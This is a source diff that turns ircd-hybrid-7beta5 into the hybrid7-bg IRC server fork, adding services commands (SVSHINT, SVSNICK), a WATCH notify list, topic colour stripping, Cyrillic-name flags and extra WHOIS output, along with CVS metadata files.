diff -uNrd ircd-hybrid-7beta5/modules/m_svshint.c hybrid7-bg/modules/m_svshint.c
--- ircd-hybrid-7beta5/modules/m_svshint.c	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/m_svshint.c	Wed Jul 24 09:09:37 2002
@@ -0,0 +1,103 @@
+/************************************************************************
+ *   IRC - Internet Relay Chat, modules/m_svshint.c
+ *   Copyright (C) 1990 Jarkko Oikarinen and
+ *                      University of Oulu, Computing Center
+ *
+ *   See file AUTHORS in IRC package for additional names of
+ *   the programmers. 
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 1, or (at your option)
+ *   any later version.
+ *
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *   GNU General Public License for more details.
+ *
+ *   You should have received a copy of the GNU General Public License
+ *   along with this program; if not, write to the Free Software
+ *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ *   $Id: m_svshint.c,v 1.5 2002/07/24 13:09:37 Administrator Exp $
+ */
+#include <string.h>
+#include "handlers.h"
+#include "client.h"
+#include "ircd.h"
+#include "numeric.h"
+#include "s_conf.h"
+#include "s_serv.h"
+#include "s_user.h"
+#include "send.h"
+#include "msg.h"
+#include "parse.h"
+#include "modules.h"
+
+static void ms_svshint(struct Client*, struct Client*, int, char**);
+
+struct Message svshint_msgtab = {
+  "SVSHINT", 0, 1, 0, 0, 0,
+  {m_unregistered, m_ignore, ms_svshint, m_ignore}
+};
+
+#ifndef STATIC_MODULES
+void
+_modinit(void)
+{
+  mod_add_cmd(&svshint_msgtab);
+}
+
+void
+_moddeinit(void)
+{
+  mod_del_cmd(&svshint_msgtab);
+}
+
+char *_version = "20010826";
+#endif
+/*
+ * ms_svshint - SVSHINT command handler
+ *      parv[0] = sender prefix
+ *      parv[1] = hint flags
+ *      parv[2] = nick
+ */
+static void ms_svshint(struct Client* client_p, struct Client* source_p,
+                      int parc, char* parv[])
+{
+  struct Client *victim;
+  unsigned int hint;
+
+  if (parc < 2)
+    {
+      sendto_ll_serv_butone(client_p, source_p, 0, ":%s SVSHINT", parv[0]);
+
+	  if (!find_z_conf(parv[0]))
+		return;
+
+      clear_svs_client_hash_table();
+      return;
+    }
+
+  if (parc < 3)
+    return;
+
+  hint = atoi(parv[1]);
+
+  sendto_ll_serv_butone(client_p, source_p, 1,
+                        ":%s SVSHINT %s :%s", parv[0], parv[1], parv[2]);
+
+  if (!find_z_conf(parv[0]))
+	return;
+
+  victim = find_client(parv[2], NULL);
+
+  if (victim && !IsServer(victim))
+    {
+      if (hint & FLAGS_SVS_IDENT)
+        victim->svsflags |= FLAGS_SVS_IDENT;
+      if (hint & FLAGS_SVS_ADMIN)
+        victim->svsflags |= FLAGS_SVS_ADMIN;
+    }
+}
diff -uNrd ircd-hybrid-7beta5/modules/m_svsnick.c hybrid7-bg/modules/m_svsnick.c
--- ircd-hybrid-7beta5/modules/m_svsnick.c	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/m_svsnick.c	Wed Jul 24 09:09:37 2002
@@ -0,0 +1,93 @@
+/************************************************************************
+ *   IRC - Internet Relay Chat, modules/m_svsnick.c
+ *   Copyright (C) 1990 Jarkko Oikarinen and
+ *                      University of Oulu, Computing Center
+ *
+ *   See file AUTHORS in IRC package for additional names of
+ *   the programmers. 
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 1, or (at your option)
+ *   any later version.
+ *
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *   GNU General Public License for more details.
+ *
+ *   You should have received a copy of the GNU General Public License
+ *   along with this program; if not, write to the Free Software
+ *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ *   $Id: m_svsnick.c,v 1.3 2002/07/24 13:09:37 Administrator Exp $
+ */
+#include <string.h>
+#include "handlers.h"
+#include "client.h"
+#include "ircd.h"
+#include "numeric.h"
+#include "s_conf.h"
+#include "s_serv.h"
+#include "s_user.h"
+#include "send.h"
+#include "msg.h"
+#include "parse.h"
+#include "modules.h"
+
+static void ms_svsnick(struct Client*, struct Client*, int, char**);
+
+struct Message svsnick_msgtab = {
+  "SVSNICK", 0, 3, 0, 0, 0,
+  {m_unregistered, m_ignore, ms_svsnick, m_ignore}
+};
+
+#ifndef STATIC_MODULES
+void
+_modinit(void)
+{
+  mod_add_cmd(&svsnick_msgtab);
+}
+
+void
+_moddeinit(void)
+{
+  mod_del_cmd(&svsnick_msgtab);
+}
+
+char *_version = "20010708";
+#endif
+/*
+ * ms_svsnick - SVSNICK command handler
+ *      parv[0] = sender prefix
+ *      parv[1] = remote server
+ *      parv[2] = old nick
+ *      parv[3] = new nick
+ */
+static void ms_svsnick(struct Client* client_p, struct Client* source_p,
+                      int parc, char* parv[])
+{
+  struct Client *victim;
+
+  if (parc < 4)
+    return;
+
+  if (hunt_server(client_p, source_p, ":%s SVSNICK %s %s :%s", 
+		  1, parc, parv) != HUNTED_ISME)
+    return;
+
+  if (!find_z_conf(parv[0]))
+    return;
+    
+  victim = find_client(parv[2], NULL);
+  if (victim && !IsServer(victim) && MyConnect(victim))
+    {
+      if (find_client(parv[3], NULL))
+	{
+	  exit_client(victim, victim, &me, "SVSNICK collision");
+	  return;
+	}
+
+      change_local_nick(victim, victim, parv[3]);
+    }
+}
diff -uNrd ircd-hybrid-7beta5/modules/m_testline.c hybrid7-bg/modules/m_testline.c
--- ircd-hybrid-7beta5/modules/m_testline.c	Wed Apr 18 22:53:23 2001
+++ hybrid7-bg/modules/m_testline.c	Mon Jul  2 00:11:55 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_testline.c,v 1.20 2001/04/19 02:53:23 a1kmm Exp $
+ *   $Id: m_testline.c,v 1.2 2001/07/02 04:11:55 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -132,9 +132,9 @@
 #else
           AF_INET
 #endif
-         );
+         , NULL);
       else
-       aconf = find_address_conf(given_host, given_name, NULL, 0);
+       aconf = find_address_conf(given_host, given_name, NULL, 0, NULL);
                  
       if(aconf)
         {
diff -uNrd ircd-hybrid-7beta5/modules/m_time.c hybrid7-bg/modules/m_time.c
--- ircd-hybrid-7beta5/modules/m_time.c	Sun Apr 15 05:44:46 2001
+++ hybrid7-bg/modules/m_time.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_time.c,v 1.19 2001/04/15 09:44:46 toot Exp $
+ *   $Id: m_time.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_topic.c hybrid7-bg/modules/m_topic.c
--- ircd-hybrid-7beta5/modules/m_topic.c	Wed May  2 02:27:05 2001
+++ hybrid7-bg/modules/m_topic.c	Sun Sep  9 08:15:24 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_topic.c,v 1.35 2001/05/02 06:27:05 db Exp $
+ *   $Id: m_topic.c,v 1.4 2001/09/09 12:15:24 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -150,6 +150,10 @@
 	      /*
 	       * chptr zeroed
 	       */
+	      if (NoColorChannel(chptr)) 
+		/*strip_color(parv[2]);*/
+		parv[2] = strip_color(parv[2], 0);
+
 	      strncpy_irc(chptr->topic, parv[2], TOPICLEN);
 	      
               MyFree(chptr->topic_info);
@@ -267,6 +271,15 @@
     {
       if ( (chptr = hash_find_channel(parv[1], NullChn)) == NULL )
 	return;
+
+      /*if ((time_t)atoi(parv[3]) > chptr->topic_time)
+        return;*/
+      if (chptr->topic[0])
+        return;
+
+      if (NoColorChannel(chptr)) 
+	/*strip_color(parv[4]);*/
+	parv[4] = strip_color(parv[4], 0);
 
       strncpy_irc(chptr->topic, parv[4], TOPICLEN);
 	      
diff -uNrd ircd-hybrid-7beta5/modules/m_trace.c hybrid7-bg/modules/m_trace.c
--- ircd-hybrid-7beta5/modules/m_trace.c	Mon May 14 09:35:31 2001
+++ hybrid7-bg/modules/m_trace.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_trace.c,v 1.25 2001/05/14 13:35:31 toot Exp $
+ *   $Id: m_trace.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "class.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_unkline.c hybrid7-bg/modules/m_unkline.c
--- ircd-hybrid-7beta5/modules/m_unkline.c	Thu Apr 19 00:29:36 2001
+++ hybrid7-bg/modules/m_unkline.c	Tue Jun  5 12:35:45 2001
@@ -21,7 +21,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- *   $Id: m_unkline.c,v 1.31 2001/04/19 04:29:36 a1kmm Exp $
+ *   $Id: m_unkline.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_user.c hybrid7-bg/modules/m_user.c
--- ircd-hybrid-7beta5/modules/m_user.c	Wed Apr  4 11:22:38 2001
+++ hybrid7-bg/modules/m_user.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_user.c,v 1.18 2001/04/04 15:22:38 androsyn Exp $
+ *   $Id: m_user.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_userhost.c hybrid7-bg/modules/m_userhost.c
--- ircd-hybrid-7beta5/modules/m_userhost.c	Wed Apr  4 11:22:38 2001
+++ hybrid7-bg/modules/m_userhost.c	Sun Jun  2 00:57:49 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_userhost.c,v 1.31 2001/04/04 15:22:38 androsyn Exp $
+ *   $Id: m_userhost.c,v 1.2 2002/06/02 04:57:49 Administrator Exp $
  */
 
 #include "handlers.h"
@@ -76,6 +76,9 @@
   int i, n;               /* loop counter */
   int cur_len;
   int rl;
+
+  if (client_p->user) 
+	  client_p->user->known = 1;
 
   cur_len = ircsprintf(buf,form_str(RPL_USERHOST),me.name, parv[0], "");
   t = buf + cur_len;
diff -uNrd ircd-hybrid-7beta5/modules/m_users.c hybrid7-bg/modules/m_users.c
--- ircd-hybrid-7beta5/modules/m_users.c	Mon Apr  9 08:41:50 2001
+++ hybrid7-bg/modules/m_users.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_users.c,v 1.18 2001/04/09 12:41:50 fl_ Exp $
+ *   $Id: m_users.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_version.c hybrid7-bg/modules/m_version.c
--- ircd-hybrid-7beta5/modules/m_version.c	Tue May 15 06:06:23 2001
+++ hybrid7-bg/modules/m_version.c	Mon Jun 10 00:40:38 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_version.c,v 1.26 2001/05/15 10:06:23 toot Exp $
+ *   $Id: m_version.c,v 1.3 2002/06/10 04:40:38 Administrator Exp $
  */
 #include <string.h>
 #include "handlers.h"
@@ -133,7 +133,7 @@
  */
 static char* confopts(struct Client *source_p)
 {
-  static char result[4];
+  static char result[16];
 
   result[0] = '\0';
 
@@ -146,6 +146,15 @@
     {
       strcat(result, "H");
     }
+
+  if (ConfigFileEntry.cyrillic)
+    strcat(result, "c");
+
+  if (ConfigFileEntry.drone_kline)
+	  if (ConfigFileEntry.drone_batch)
+		  strcat(result, "k");
+	  else
+		  strcat(result, "K");
 
   return result;
 }
diff -uNrd ircd-hybrid-7beta5/modules/m_wallops.c hybrid7-bg/modules/m_wallops.c
--- ircd-hybrid-7beta5/modules/m_wallops.c	Wed Apr  4 11:22:39 2001
+++ hybrid7-bg/modules/m_wallops.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_wallops.c,v 1.22 2001/04/04 15:22:39 androsyn Exp $
+ *   $Id: m_wallops.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_watch.c hybrid7-bg/modules/m_watch.c
--- ircd-hybrid-7beta5/modules/m_watch.c	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/m_watch.c	Wed Sep 18 19:19:46 2002
@@ -0,0 +1,245 @@
+/************************************************************************
+ *   IRC - Internet Relay Chat, modules/m_watch.c
+ *   Copyright (C) 1990 Jarkko Oikarinen and
+ *                      University of Oulu, Computing Center
+ *
+ *   See file AUTHORS in IRC package for additional names of
+ *   the programmers. 
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 1, or (at your option)
+ *   any later version.
+ *
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *   GNU General Public License for more details.
+ *
+ *   You should have received a copy of the GNU General Public License
+ *   along with this program; if not, write to the Free Software
+ *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ *   $Id: m_watch.c,v 1.3 2002/09/17 15:25:34 Administrator Exp $
+ */
+#include <string.h>
+#include "handlers.h"
+#include "client.h"
+#include "ircd.h"
+#include "numeric.h"
+#include "s_conf.h"
+#include "s_serv.h"
+#include "s_user.h"
+#include "s_log.h"
+#include "s_misc.h"
+#include "send.h"
+#include "msg.h"
+#include "parse.h"
+#include "modules.h"
+
+static void m_watch(struct Client*, struct Client*, int, char**);
+static void show_watch(aClient *cptr, char *name, int rpl1, int rpl2);
+
+struct Message watch_msgtab = {
+  "WATCH", 0, 0, 0, MFLG_SLOW, 0,
+  {m_unregistered, m_watch, m_ignore, m_watch}
+};
+
+#ifndef STATIC_MODULES
+void
+_modinit(void)
+{
+  mod_add_cmd(&watch_msgtab);
+}
+
+void
+_moddeinit(void)
+{
+  mod_del_cmd(&watch_msgtab);
+}
+
+char *_version = "20020722";
+#endif
+
+/*
+ *	shamelessly stolen from bahamut				
+ *						-demond
+ */
+
+static char buf[BUFSIZE];
+
+/*
+ * RPL_NOWON   - Online at the moment (Succesfully added to WATCH-list)
+ * RPL_NOWOFF  - Offline at the moement (Succesfully added to WATCH-list)
+ * RPL_WATCHOFF   - Succesfully removed from WATCH-list.
+ * ERR_TOOMANYWATCH - Take a guess :>  Too many WATCH entries.
+ */
+static void show_watch(aClient *cptr, char *name, int rpl1, int rpl2) 
+{
+    aClient *acptr;	
+    
+    if ((acptr = find_person(name, NULL)))
+	sendto_one(cptr, form_str(rpl1), me.name, cptr->name,
+		   acptr->name, acptr->username,
+		   acptr->host, acptr->lasttime);
+    else
+	sendto_one(cptr, form_str(rpl2), me.name, cptr->name,
+		   name, "*", "*", 0);
+}
+	
+/* m_watch */
+static void m_watch(aClient *cptr, aClient *sptr, int parc, char *parv[]) 
+{
+    aClient  *acptr;
+    char  *s, *p, *user;
+    char def[2] = "l";
+	int i;
+	
+    if (parc < 2) 
+    {
+	/* Default to 'l' - list who's currently online */
+	parc = 2;
+	parv[1] = def;
+    }
+    
+    /*for (p = NULL, s = strtoken(&p, parv[1], ", "); s;
+	 s = strtoken(&p, NULL, ", "))*/
+	/*                                                */
+	/* this works on bahamut only...                  */
+	/*                                  -demond       */
+	/*                                                */
+	for (i = 1, s = parv[1]; i < parc; s = parv[++i])
+    {
+	if ((user = (char *)strchr(s, '!')))
+	    *user++ = '\0'; /* Not used */
+		
+	/*
+	 * Prefix of "+", they want to add a name to their WATCH
+	 * list. 
+	 */
+	if (*s == '+') 
+	{
+	    if (*(s+1)) 
+	    {
+		if (sptr->watches >= MAXWATCH) 
+		{
+		    sendto_one(sptr, form_str(ERR_TOOMANYWATCH),
+			       me.name, cptr->name, s+1);					
+		    continue;
+		}				
+		add_to_watch_hash_table(s+1, sptr);
+	    }
+	    show_watch(sptr, s+1, RPL_NOWON, RPL_NOWOFF);
+	    continue;
+	}
+	
+	/*
+	 * Prefix of "-", coward wants to remove somebody from their
+	 * WATCH list.  So do it. :-)
+	 */
+	if (*s == '-') 
+	{
+	    del_from_watch_hash_table(s+1, sptr);
+	    show_watch(sptr, s+1, RPL_WATCHOFF, RPL_WATCHOFF);
+	    continue;
+	}
+					
+	/*
+	 * Fancy "C" or "c", they want to nuke their WATCH list and start
+	 * over, so be it.
+	 */
+	if (*s == 'C' || *s == 'c') 
+	{
+	    hash_del_watch_list(sptr);
+	    continue;
+	}
+		
+	/*
+	 * Now comes the fun stuff, "S" or "s" returns a status report of
+	 * their WATCH list.  I imagine this could be CPU intensive if its
+	 * done alot, perhaps an auto-lag on this?
+	 */
+	if (*s == 'S' || *s == 's') 
+	{
+	    Link *lp;
+	    aWatch *anptr;
+	    int  count = 0;
+							
+	    /*
+	     * Send a list of how many users they have on their WATCH list
+	     * and how many WATCH lists they are on.
+	     */
+	    anptr = hash_get_watch(sptr->name);
+	    if (anptr)
+		for (lp = anptr->watch, count = 1; (lp = lp->next); count++);
+	    sendto_one(sptr, form_str(RPL_WATCHSTAT), me.name, parv[0],
+		       sptr->watches, count);
+			
+	    /*
+	     * Send a list of everybody in their WATCH list. Be careful
+	     * not to buffer overflow.
+	     */
+	    if ((lp = sptr->watch) == NULL) 
+	    {
+		sendto_one(sptr, form_str(RPL_ENDOFWATCHLIST), me.name, parv[0],
+			   *s);
+		continue;
+	    }
+	    *buf = '\0';
+	    strcpy(buf, lp->value.wptr->nick);
+	    count = strlen(parv[0])+strlen(me.name)+10+strlen(buf);
+	    while ((lp = lp->next)) 
+	    {
+		if (count+strlen(lp->value.wptr->nick)+1 > BUFSIZE - 2) 
+		{
+		    sendto_one(sptr, form_str(RPL_WATCHLIST), me.name,
+			       parv[0], buf);
+		    *buf = '\0';
+		    count = strlen(parv[0])+strlen(me.name)+10;
+		}
+		strcat(buf, " ");
+		strcat(buf, lp->value.wptr->nick);
+		count += (strlen(lp->value.wptr->nick)+1);
+	    }
+	    sendto_one(sptr, form_str(RPL_WATCHLIST), me.name, parv[0], buf);
+	    sendto_one(sptr, form_str(RPL_ENDOFWATCHLIST), me.name, parv[0],
+		       *s);
+	    continue;
+	}
+		
+	/*
+	 * Well that was fun, NOT.  Now they want a list of everybody in
+	 * their WATCH list AND if they are online or offline? Sheesh,
+	 * greedy arn't we?
+	 */
+	if (*s == 'L' || *s == 'l') 
+	{
+	    Link *lp = sptr->watch;
+			
+	    while (lp) 
+	    {
+		if ((acptr = find_person(lp->value.wptr->nick, NULL)))
+		    sendto_one(sptr, form_str(RPL_NOWON), me.name, parv[0],
+			       acptr->name, acptr->username,
+			       acptr->host, acptr->tsinfo);
+		/*
+		 * But actually, only show them offline if its a capital
+		 * 'L' (full list wanted).
+		 */
+		else if (isupper(*s))
+		    sendto_one(sptr, form_str(RPL_NOWOFF), me.name, parv[0],
+			       lp->value.wptr->nick, "*", "*",
+			       lp->value.wptr->lasttime);
+		lp = lp->next;
+	    }
+			
+	    sendto_one(sptr, form_str(RPL_ENDOFWATCHLIST), me.name, parv[0],
+		       *s);
+	    continue;
+	}
+	/* Hmm.. unknown prefix character.. Ignore it. :-) */
+    }
+	
+    /*return 0;*/
+}
+
diff -uNrd ircd-hybrid-7beta5/modules/m_who.c hybrid7-bg/modules/m_who.c
--- ircd-hybrid-7beta5/modules/m_who.c	Fri Apr 20 00:59:27 2001
+++ hybrid7-bg/modules/m_who.c	Sun Jun  2 00:57:49 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_who.c,v 1.39 2001/04/20 04:59:27 db Exp $
+ *   $Id: m_who.c,v 1.2 2002/06/02 04:57:49 Administrator Exp $
  */
 #include "tools.h"
 #include "common.h"   /* bleah */
@@ -100,6 +100,9 @@
   char  flags[MAX_SUBLISTS][2];
   int   server_oper = parc > 2 ? (*parv[2] == 'o' ): 0; /* Show OPERS only */
   int   member;
+
+  if (client_p->user) 
+	  client_p->user->known = 1;
 
   /*
   **  Following code is some ugly hacking to preserve the
diff -uNrd ircd-hybrid-7beta5/modules/m_whois.c hybrid7-bg/modules/m_whois.c
--- ircd-hybrid-7beta5/modules/m_whois.c	Fri Apr 27 17:09:40 2001
+++ hybrid7-bg/modules/m_whois.c	Mon Dec  3 23:21:40 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_whois.c,v 1.61 2001/04/27 21:09:40 habeeb Exp $
+ *   $Id: m_whois.c,v 1.8 2001/12/04 04:21:40 demond Exp $
  */
 
 #include <string.h>
@@ -373,6 +373,32 @@
 	 target_p->username, target_p->host, target_p->info);
   server_name = (char *)target_p->user->server;
 
+  if (IsOper(source_p) || (target_p == source_p))
+    sendto_one(source_p, form_str(RPL_WHOISREALHOST), me.name,
+	       source_p->name, target_p->name,
+	       ServerInfo.network_name, target_p->realhost);
+
+  if (target_p->svsflags && find_services()) 
+    {
+      t = buf; t[0] = 0;
+      
+      if (target_p->svsflags & FLAGS_SVS_IDENT)
+        { ircsprintf(t, "this nick"); t += strlen(t); }
+
+      if (target_p->svsflags & FLAGS_SVS_IDENT &&
+          target_p->svsflags & FLAGS_SVS_ADMIN)
+        { ircsprintf(t, ", "); t += strlen(t); }
+
+      if (target_p->svsflags & FLAGS_SVS_ADMIN)
+        { ircsprintf(t, "services admin"); t += strlen(t); }
+
+      sendto_one(source_p, form_str(RPL_WHOISSVSHINT), me.name,
+               source_p->name, target_p->name, buf);
+    }
+
+  if (find_z_conf(server_name) && !IsOper(source_p))
+    goto rplserver;
+
   ircsprintf(buf, form_str(RPL_WHOISCHANNELS),
 	       me.name, source_p->name, target_p->name, "");
 
@@ -422,7 +448,8 @@
 
   if (reply_to_send)
     sendto_one(source_p, "%s", buf);
-          
+
+ rplserver:          
   if ((IsOper(source_p) || !GlobalSetOptions.hide_server) || target_p == source_p)
     sendto_one(source_p, form_str(RPL_WHOISSERVER),
 	       me.name, source_p->name, target_p->name, server_name,
@@ -445,6 +472,20 @@
       if (IsAdmin(target_p))
 	sendto_one(source_p, form_str(RPL_WHOISADMIN),
 		   me.name, source_p->name, target_p->name);
+    }
+
+  if (ConfigFileEntry.cyrillic)
+    {
+      char *p;
+      for (p = target_p->name; *p; p++)
+	{
+	  if ((unsigned char)*p >= 192)
+	    {
+	      sendto_one(source_p, form_str(RPL_WHOISCYRILLIC),
+			 me.name, source_p->name, target_p->name);
+	      break;
+	    }
+	}
     }
 
   if ( (glob == 1) ||
diff -uNrd ircd-hybrid-7beta5/modules/m_whowas.c hybrid7-bg/modules/m_whowas.c
--- ircd-hybrid-7beta5/modules/m_whowas.c	Mon Apr  9 08:41:51 2001
+++ hybrid7-bg/modules/m_whowas.c	Tue Jun  5 12:35:45 2001
@@ -16,7 +16,7 @@
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
-*   $Id: m_whowas.c,v 1.20 2001/04/09 12:41:51 fl_ Exp $
+*   $Id: m_whowas.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
 */
 #include "whowas.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/src/CVS/Entries hybrid7-bg/src/CVS/Entries
--- ircd-hybrid-7beta5/src/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/CVS/Entries	Wed Sep 18 19:19:46 2002
@@ -0,0 +1,63 @@
+/.depend/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/adns.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/channel.c/1.12/Thu Jul 11 19:02:37 2002//
+/class.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/client.c/1.8/Wed Jul 24 17:38:27 2002//
+/debug.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/descrip.mms/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/dline_conf.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/event.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/fdlist.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/fileio.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/getopt.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/hash.c/1.6/Wed Jul 24 14:05:38 2002//
+/hook.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/hostmask.c/1.2/Mon Jul  2 04:12:16 2001//
+/irc_string.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/ircd.c/1.8/Thu Jul 11 19:12:36 2002//
+/ircd_lexer.l/1.19/Fri Jul 19 04:23:19 2002//
+/ircd_parser.y/1.20/Fri Jul 19 04:23:19 2002//
+/ircd_signal.c/1.2/Tue Jul 23 05:20:24 2002//
+/ircdauth.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/linebuf.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/list.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/listener.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/m_error.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/match.c/1.2/Sat Feb 23 20:02:20 2002//
+/md5.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/memory.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/messages.tab/1.15/Wed Jul 24 13:10:05 2002//
+/modules-dld.c/1.2/Sun Jun 17 01:27:38 2001//
+/modules.c/1.6/Wed Jul 24 19:04:31 2002//
+/motd.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/numeric.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/oldparse.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/packet.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/parse.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/patricia.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/restart.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/rsa.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_auth.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_bsd.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_bsd_devpoll.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_bsd_kqueue.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_bsd_poll.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_bsd_select.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_conf.c/1.15/Fri Jul 19 04:23:20 2002//
+/s_debug.c/1.2/Tue Jul  9 19:19:31 2002//
+/s_gline.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/s_log.c/1.2/Thu Jul  5 05:37:31 2001//
+/s_misc.c/1.16/Wed Jul 24 13:10:05 2002//
+/s_stats.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/scache.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/send.c/1.5/Sat Feb 23 20:02:42 2002//
+/sprintf_irc.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/tools.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/vchannel.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/version.c.SH/1.1.1.1/Tue Jun  5 16:35:46 2001//
+/whowas.c/1.1.1.1/Tue Jun  5 16:35:46 2001//
+D/conf////
+D/test////
+/s_serv.c/1.20/Wed Sep 18 23:19:46 2002//
+/s_user.c/1.16/Wed Sep 18 23:19:46 2002//
diff -uNrd ircd-hybrid-7beta5/src/CVS/Repository hybrid7-bg/src/CVS/Repository
--- ircd-hybrid-7beta5/src/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/CVS/Repository	Wed Jul 24 18:32:00 2002
@@ -0,0 +1 @@
+hybrid7-bg/src
